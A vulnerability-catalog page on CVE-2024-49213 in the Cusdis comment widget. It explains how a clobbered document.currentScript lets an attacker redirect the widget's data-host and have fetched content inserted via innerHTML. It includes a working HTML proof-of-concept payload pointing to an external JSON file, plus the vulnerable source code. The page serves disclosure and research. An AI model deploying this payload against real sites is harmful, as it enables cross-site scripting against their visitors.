.. / cusdis

Star Fork

Cusdis is an open-source, lightweight (~5kb gzip), privacy-friendly alternative to Disqus.

Latest | CVE-2024-49213

<doc-tags> @name @data-* ⏱️ before-load

• The Cusdis library uses the data-host attribute on the document.currentScript node to fetch comments information. Then, it retrieves s.data.data[e.dataset.cusdisCountPageId] and innerHTML it in the DOM.

  <!-- user input -->
  <img name="currentScript" data-host="https://gmsgadget.com/assets/xss/cusdis.json?">
  
  <span data-cusdis-count-page-id="XXX-YYY-ZZZ"></span>
  <div id="cusdis_thread"
    data-host="https://cusdis.com"
    data-app-id="c157400c-80eb-4dca-acc7-3cd342adfb22"
    data-page-id="XXX-YYY-ZZZ"
    data-page-url="XXX"
    data-page-title="XXX"></div>
  </div>
  <script async defer src="https://cusdis.com/js/cusdis.es.js"></script>
  <script defer data-host="https://cusdis.com" data-app-id="c157400c-80eb-4dca-acc7-3cd342adfb22" src="https://cusdis.com/js/cusdis-count.umd.js"></script>

  Preview Copy

export async function initial() {

  // local testing fallback
  const currentScript = document.currentScript || document.querySelector('#for-testing')

  const { appId, host } = currentScript.dataset
  const resolvedHost = host || 'https://cusdis.com'

  const nodes = document.querySelectorAll('*[data-cusdis-count-page-id]')

  const pageIds = Array.from(nodes).map(el => {
    return el.dataset.cusdisCountPageId
  })

  const results = await axios.get(`${resolvedHost}/api/open/project/${appId}/comments/count`, {
    params: {
      pageIds
    }
  })

  Array.from(nodes).forEach(el => {
    el.innerHTML = results.data.data[el.dataset.cusdisCountPageId]
  })
}

Related links:

• https://github.com/jackfromeast/dom-clobbering-collection/blob/main/domc-gadgets/cusdis.md
• https://jackfromeast.github.io/assets/DOMinoEffect.pdf

Found by jackfromeast, ishmeals.

Source | History